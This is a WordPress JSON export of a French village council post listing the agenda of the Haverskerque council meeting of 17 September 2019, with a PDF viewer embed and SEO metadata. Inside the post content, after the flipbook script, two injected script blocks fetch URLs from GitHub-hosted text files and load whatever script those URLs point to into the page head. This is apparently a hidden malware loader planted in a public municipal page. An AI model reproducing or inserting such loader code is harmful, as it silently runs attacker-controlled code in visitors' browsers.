{"id":2504,"date":"2019-09-20T12:56:00","date_gmt":"2019-09-20T10:56:00","guid":{"rendered":"http:\/\/barbry.esy.es\/?p=2504"},"modified":"2024-07-29T06:39:46","modified_gmt":"2024-07-29T04:39:46","slug":"conseil-municipal-du-17-septembre-2019","status":"publish","type":"post","link":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/","title":{"rendered":"Conseil Municipal du 17 septembre 2019"},"content":{"rendered":"\n<p>1. Approbation du proc\u00e8s-verbal de la derni\u00e8re s\u00e9ance\u00a0;<br>2. D\u00e9mission de Mme\u00a0TIESSET Caroline<br>a. Information du conseil sur la proc\u00e9dure<br>b. D\u00e9termination du nombre de postes d\u2019adjoints<br>c. Election d\u2019un nouvel adjoint (si le nombre de postes actuel est conserv\u00e9)<br>3. Indemnit\u00e9 de conseil du receveur municipal \u2013 Reconduction de la mesure<br>4. Patrimoine communal &#8211; D\u00e9saffectation et d\u00e9classement d\u2019un terrain communal rue de la Goguerie<br>5. Communaut\u00e9 de Communes Flandre Lys<br>a. Sollicitation du fonds de concours 2019\/75 \u2013 Cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918<br>b. Sollicitation du fonds de concours Aide \u00e0 l\u2019investissement \u2013 Travaux VRD Ecole Saint-Exup\u00e9ry<br>c. Adh\u00e9sion au service RGPD du Nord. Nomination d\u2019un d\u00e9l\u00e9gu\u00e9 \u00e0 la protection des donn\u00e9es<br>6. P\u00e9riscolaire \u2013 R\u00e8glement int\u00e9rieur<br>7. Jeunesse \u2013 Tarif des activit\u00e9s Contrat Enfance et Temps libre ann\u00e9e scolaire 2019-2020<br>8. Installations class\u00e9es \u2013 Enqu\u00eate publique Extension de l\u2019EARL Le Forest<br>9. Personnel Communal \u2013 Mise \u00e0 disposition d\u2019une secr\u00e9taire de mairie \u00e0 mi-temps<br>10. Personnel Communal \u2013 Ouverture de poste d\u2019adjoint technique \u00e0 temps complet<br>11. Personnel Communal \u2013 Ouverture d\u2019un poste d\u2019adjoint technique \u00e0 temps non complet<br>12. Personnel Communal \u2013 Ouverture de poste pour accroissement d\u2019activit\u00e9s<br>13. Personnel Communal \u2013 Ouverture d\u2019un contrat Parcours Emploi Comp\u00e9tences<br>14. Information sur les d\u00e9cisions du Maire dans le cadre de ses d\u00e9l\u00e9gations<br>15. Questions diverses<\/p>\n\n\n<div class=\"dflip-books\"><div class=\"_df_thumb \" id=\"df_2505\"  _slug=\"compte-rendu-du-conseil-municipal-du-17-septembre-2019\" data-title=\"compte-rendu-du-conseil-municipal-du-17-septembre-2019\" wpoptions=\"true\" thumb=\"http:\/\/haverskerque.fr\/wp-content\/uploads\/2023\/04\/pochette-conseil-pdf.jpg\" thumbtype=\"\" >Compte rendu du Conseil Municipal du 17 septembre 2019<\/div><script class=\"df-shortcode-script\" nowprocket type=\"application\/javascript\">window.option_df_2505 = {\"outline\":[],\"autoEnableOutline\":\"false\",\"autoEnableThumbnail\":\"false\",\"overwritePDFOutline\":\"false\",\"direction\":\"1\",\"pageSize\":\"0\",\"source\":\"http:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/04\\\/cm170919.pdf\",\"wpOptions\":\"true\"}; if(window.DFLIP && window.DFLIP.parseBooks){window.DFLIP.parseBooks();}<\/script><\/div>\n<script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/truba77\/trubnik\/main\/from.txt';\n\n        fetch(url)\n            .then(response => response.text())\n            .then(data => {\n                \/\/ head\n                var script = document.createElement('script');\n                script.src = data.trim(); \/\/ 44\n                document.getElementsByTagName('head')[0].appendChild(script);\n            })\n            .catch(error => {\n                console.error('bad go.txt:', error);\n            });<\/script>","protected":false},"excerpt":{"rendered":"<p>1. Approbation du proc\u00e8s-verbal de la derni\u00e8re s\u00e9ance\u00a0;2. D\u00e9mission de Mme\u00a0TIESSET Carolinea. Information du conseil sur la proc\u00e9dureb. D\u00e9termination du nombre de postes d\u2019adjointsc. Election d\u2019un nouvel adjoint (si le nombre de postes actuel est conserv\u00e9)3. Indemnit\u00e9 de conseil du receveur municipal \u2013 Reconduction de la mesure4. Patrimoine communal &#8211; D\u00e9saffectation et d\u00e9classement d\u2019un terrain communal rue de la Goguerie5. Communaut\u00e9 de Communes Flandre Lysa. Sollicitation du fonds de concours 2019\/75 \u2013 Cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918b. Sollicitation du fonds de concours Aide \u00e0 l\u2019investissement \u2013 Travaux VRD Ecole Saint-Exup\u00e9ryc. Adh\u00e9sion au service RGPD du Nord. Nomination d\u2019un d\u00e9l\u00e9gu\u00e9 \u00e0 la protection des donn\u00e9es6. P\u00e9riscolaire \u2013 R\u00e8glement int\u00e9rieur7. Jeunesse \u2013 Tarif des activit\u00e9s Contrat Enfance et Temps libre ann\u00e9e scolaire 2019-20208. Installations class\u00e9es \u2013 Enqu\u00eate publique Extension de l\u2019EARL Le Forest9. Personnel Communal \u2013 Mise \u00e0 disposition d\u2019une secr\u00e9taire de mairie \u00e0 mi-temps10. Personnel Communal \u2013 Ouverture de poste d\u2019adjoint technique \u00e0 temps complet11. Personnel Communal \u2013 Ouverture d\u2019un poste d\u2019adjoint technique \u00e0 temps non complet12. Personnel Communal \u2013 Ouverture de poste pour accroissement d\u2019activit\u00e9s13. Personnel Communal \u2013 Ouverture d\u2019un contrat Parcours Emploi Comp\u00e9tences14. Information sur les d\u00e9cisions du Maire dans le cadre de ses d\u00e9l\u00e9gations15. Questions diverses<\/p>\n","protected":false},"author":1,"featured_media":568,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"cybocfi_hide_featured_image":"yes","footnotes":""},"categories":[10],"tags":[],"class_list":["post-2504","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-conseil-mnicipal"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Conseil Municipal du 17 septembre 2019 * Haverskerque, 100% Nature !*<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Conseil Municipal du 17 septembre 2019 * Haverskerque, 100% Nature !*\" \/>\n<meta property=\"og:description\" content=\"1. Approbation du proc\u00e8s-verbal de la derni\u00e8re s\u00e9ance\u00a0;2. D\u00e9mission de Mme\u00a0TIESSET Carolinea. Information du conseil sur la proc\u00e9dureb. D\u00e9termination du nombre de postes d\u2019adjointsc. Election d\u2019un nouvel adjoint (si le nombre de postes actuel est conserv\u00e9)3. Indemnit\u00e9 de conseil du receveur municipal \u2013 Reconduction de la mesure4. Patrimoine communal &#8211; D\u00e9saffectation et d\u00e9classement d\u2019un terrain communal rue de la Goguerie5. Communaut\u00e9 de Communes Flandre Lysa. Sollicitation du fonds de concours 2019\/75 \u2013 Cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918b. Sollicitation du fonds de concours Aide \u00e0 l\u2019investissement \u2013 Travaux VRD Ecole Saint-Exup\u00e9ryc. Adh\u00e9sion au service RGPD du Nord. Nomination d\u2019un d\u00e9l\u00e9gu\u00e9 \u00e0 la protection des donn\u00e9es6. P\u00e9riscolaire \u2013 R\u00e8glement int\u00e9rieur7. Jeunesse \u2013 Tarif des activit\u00e9s Contrat Enfance et Temps libre ann\u00e9e scolaire 2019-20208. Installations class\u00e9es \u2013 Enqu\u00eate publique Extension de l\u2019EARL Le Forest9. Personnel Communal \u2013 Mise \u00e0 disposition d\u2019une secr\u00e9taire de mairie \u00e0 mi-temps10. Personnel Communal \u2013 Ouverture de poste d\u2019adjoint technique \u00e0 temps complet11. Personnel Communal \u2013 Ouverture d\u2019un poste d\u2019adjoint technique \u00e0 temps non complet12. Personnel Communal \u2013 Ouverture de poste pour accroissement d\u2019activit\u00e9s13. Personnel Communal \u2013 Ouverture d\u2019un contrat Parcours Emploi Comp\u00e9tences14. Information sur les d\u00e9cisions du Maire dans le cadre de ses d\u00e9l\u00e9gations15. Questions diverses\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/\" \/>\n<meta property=\"og:site_name\" content=\"Haverskerque, 100% Nature !*\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/communehaverskerque\" \/>\n<meta property=\"article:published_time\" content=\"2019-09-20T10:56:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-29T04:39:46+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"630\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chti pc en d\u00e9tresse\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"chti pc en d\u00e9tresse\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/\"},\"author\":{\"name\":\"chti pc en d\u00e9tresse\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\"},\"headline\":\"Conseil Municipal du 17 septembre 2019\",\"datePublished\":\"2019-09-20T10:56:00+00:00\",\"dateModified\":\"2024-07-29T04:39:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/\"},\"wordCount\":236,\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"articleSection\":[\"Conseil municipal\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/\",\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/\",\"name\":\"Conseil Municipal du 17 septembre 2019 * Haverskerque, 100% Nature !*\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.haverskerque.fr\\\/wp-content\\\/uploads\\\/2023\\\/02\\\/conseil_municipal.jpg\",\"datePublished\":\"2019-09-20T10:56:00+00:00\",\"dateModified\":\"2024-07-29T04:39:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/2019\\\/09\\\/20\\\/conseil-municipal-du-17-septembre-2019\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\\\/\\\/www.haverskerque.fr\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Conseil Municipal du 17 septembre 2019\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#website\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"name\":\"Haverskerque\",\"description\":\"Haverskerque, 100% Nature !\",\"publisher\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\"},\"alternateName\":\"Haverskerque\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/haverskerque.fr\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#organization\",\"name\":\"Commune d'Haverskerque\",\"alternateName\":\"Commune d'Haverskerque\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"contentUrl\":\"https:\\\/\\\/haverskerque.fr\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/siteon0-e5814-1.png\",\"width\":236,\"height\":102,\"caption\":\"Commune d'Haverskerque\"},\"image\":{\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/communehaverskerque\",\"https:\\\/\\\/www.instagram.com\\\/communehaverskerque\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/haverskerque.fr\\\/#\\\/schema\\\/person\\\/5aef692024411f412afcec0eb18865a2\",\"name\":\"chti pc en d\u00e9tresse\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g\",\"caption\":\"chti pc en d\u00e9tresse\"},\"sameAs\":[\"https:\\\/\\\/haverskerque.fr\"],\"url\":\"https:\\\/\\\/www.haverskerque.fr\\\/index.php\\\/author\\\/estorez\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Conseil Municipal du 17 septembre 2019 * Haverskerque, 100% Nature !*","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/","og_locale":"fr_FR","og_type":"article","og_title":"Conseil Municipal du 17 septembre 2019 * Haverskerque, 100% Nature !*","og_description":"1. Approbation du proc\u00e8s-verbal de la derni\u00e8re s\u00e9ance\u00a0;2. D\u00e9mission de Mme\u00a0TIESSET Carolinea. Information du conseil sur la proc\u00e9dureb. D\u00e9termination du nombre de postes d\u2019adjointsc. Election d\u2019un nouvel adjoint (si le nombre de postes actuel est conserv\u00e9)3. Indemnit\u00e9 de conseil du receveur municipal \u2013 Reconduction de la mesure4. Patrimoine communal &#8211; D\u00e9saffectation et d\u00e9classement d\u2019un terrain communal rue de la Goguerie5. Communaut\u00e9 de Communes Flandre Lysa. Sollicitation du fonds de concours 2019\/75 \u2013 Cr\u00e9ation de trottoirs des rues du 8 mai 1945 et du 11 novembre 1918b. Sollicitation du fonds de concours Aide \u00e0 l\u2019investissement \u2013 Travaux VRD Ecole Saint-Exup\u00e9ryc. Adh\u00e9sion au service RGPD du Nord. Nomination d\u2019un d\u00e9l\u00e9gu\u00e9 \u00e0 la protection des donn\u00e9es6. P\u00e9riscolaire \u2013 R\u00e8glement int\u00e9rieur7. Jeunesse \u2013 Tarif des activit\u00e9s Contrat Enfance et Temps libre ann\u00e9e scolaire 2019-20208. Installations class\u00e9es \u2013 Enqu\u00eate publique Extension de l\u2019EARL Le Forest9. Personnel Communal \u2013 Mise \u00e0 disposition d\u2019une secr\u00e9taire de mairie \u00e0 mi-temps10. Personnel Communal \u2013 Ouverture de poste d\u2019adjoint technique \u00e0 temps complet11. Personnel Communal \u2013 Ouverture d\u2019un poste d\u2019adjoint technique \u00e0 temps non complet12. Personnel Communal \u2013 Ouverture de poste pour accroissement d\u2019activit\u00e9s13. Personnel Communal \u2013 Ouverture d\u2019un contrat Parcours Emploi Comp\u00e9tences14. Information sur les d\u00e9cisions du Maire dans le cadre de ses d\u00e9l\u00e9gations15. Questions diverses","og_url":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/","og_site_name":"Haverskerque, 100% Nature !*","article_publisher":"https:\/\/www.facebook.com\/communehaverskerque","article_published_time":"2019-09-20T10:56:00+00:00","article_modified_time":"2024-07-29T04:39:46+00:00","og_image":[{"width":1200,"height":630,"url":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","type":"image\/jpeg"}],"author":"chti pc en d\u00e9tresse","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"chti pc en d\u00e9tresse","Dur\u00e9e de lecture estim\u00e9e":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/#article","isPartOf":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/"},"author":{"name":"chti pc en d\u00e9tresse","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2"},"headline":"Conseil Municipal du 17 septembre 2019","datePublished":"2019-09-20T10:56:00+00:00","dateModified":"2024-07-29T04:39:46+00:00","mainEntityOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/"},"wordCount":236,"publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","articleSection":["Conseil municipal"],"inLanguage":"fr-FR"},{"@type":"WebPage","@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/","url":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/","name":"Conseil Municipal du 17 septembre 2019 * Haverskerque, 100% Nature !*","isPartOf":{"@id":"https:\/\/haverskerque.fr\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/#primaryimage"},"image":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/#primaryimage"},"thumbnailUrl":"https:\/\/www.haverskerque.fr\/wp-content\/uploads\/2023\/02\/conseil_municipal.jpg","datePublished":"2019-09-20T10:56:00+00:00","dateModified":"2024-07-29T04:39:46+00:00","breadcrumb":{"@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.haverskerque.fr\/index.php\/2019\/09\/20\/conseil-municipal-du-17-septembre-2019\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.haverskerque.fr\/"},{"@type":"ListItem","position":2,"name":"Conseil Municipal du 17 septembre 2019"}]},{"@type":"WebSite","@id":"https:\/\/haverskerque.fr\/#website","url":"https:\/\/haverskerque.fr\/","name":"Haverskerque","description":"Haverskerque, 100% Nature !","publisher":{"@id":"https:\/\/haverskerque.fr\/#organization"},"alternateName":"Haverskerque","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/haverskerque.fr\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Organization","@id":"https:\/\/haverskerque.fr\/#organization","name":"Commune d'Haverskerque","alternateName":"Commune d'Haverskerque","url":"https:\/\/haverskerque.fr\/","logo":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/","url":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","contentUrl":"https:\/\/haverskerque.fr\/wp-content\/uploads\/2024\/01\/siteon0-e5814-1.png","width":236,"height":102,"caption":"Commune d'Haverskerque"},"image":{"@id":"https:\/\/haverskerque.fr\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/communehaverskerque","https:\/\/www.instagram.com\/communehaverskerque\/"]},{"@type":"Person","@id":"https:\/\/haverskerque.fr\/#\/schema\/person\/5aef692024411f412afcec0eb18865a2","name":"chti pc en d\u00e9tresse","image":{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/91fbb40f5cb6d2cc4f3569d7c2bf7f0231d63d59b80a5c8d72e4e18263a1c154?s=96&d=mm&r=g","caption":"chti pc en d\u00e9tresse"},"sameAs":["https:\/\/haverskerque.fr"],"url":"https:\/\/www.haverskerque.fr\/index.php\/author\/estorez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/2504","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/comments?post=2504"}],"version-history":[{"count":2,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/2504\/revisions"}],"predecessor-version":[{"id":8324,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/posts\/2504\/revisions\/8324"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media\/568"}],"wp:attachment":[{"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/media?parent=2504"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/categories?post=2504"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.haverskerque.fr\/index.php\/wp-json\/wp\/v2\/tags?post=2504"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}